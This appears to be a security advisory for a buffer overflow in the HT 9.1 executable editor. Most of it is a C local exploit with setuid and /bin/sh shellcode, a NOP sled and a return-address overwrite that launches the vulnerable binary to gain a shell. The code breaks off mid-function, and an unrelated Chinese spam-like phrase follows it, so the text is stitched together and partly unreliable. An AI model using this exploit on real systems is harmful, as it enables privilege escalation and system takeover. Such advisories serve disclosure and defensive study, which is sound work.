HT is a "file editor/viewer/analyzer for executables. The goal is to combine the low-level functionality of a debugger and the usability of IDEs. We plan to implement all (hex-)editing features and support of the most important file formats". A vulnerability in HT allows attackers to supply a malicious file that will cause a buffer overflow to occur when it copies [filename] to [fullfilename] and print it on *htapp::window_create_file_bin using *printf()*. Exploit: /* * HT 9.1 (local exploit) * By Qnix * * */ #include #include #define SZ 4090 char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() */ "\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd" "\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80" "\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0" "\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50" "\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89" "\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; unsigned long sp(void) { __asm__("movl %esp, %eax");} int main(int argc, char *argv[]) { int i, offset; long esp, ret, *addr_ptr; char *buffer, *ptr; offset = 0; esp = sp(); ret = esp - offset; msg(); if(argc != 2) { fprintf(stderr,"Usage : %s \n",argv[0]); exit(0); } fprintf(stdout,"[~] Stack pointer (ESP) : 0x%x\n", esp); fprintf(stdout,"[~] Offset from ESP : 0x%x\n", offset); fprintf(stdout,"[~] Desired Return Addr : 0x%x\n\n", ret); buffer = malloc(SZ); ptr = buffer; addr_ptr = (long *) ptr; for(i=0; i < SZ; i+=4) { *(addr_ptr++) = ret; } for(i=0; i < 200; i++) { buffer[i] = '\x90'; } ptr = buffer + 200; for(i=0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buffer[SZ-4] = 0; execl(argv[1], "ht", buffer, 0); free(buffer); return 0; } int msg() { fprintf(stdout,"\n -------------------------------- \n"); fprintf(stdout," HT 9.1 (local exploit)\n"); fprintf(stdout," By Qnix

亚洲欧美在线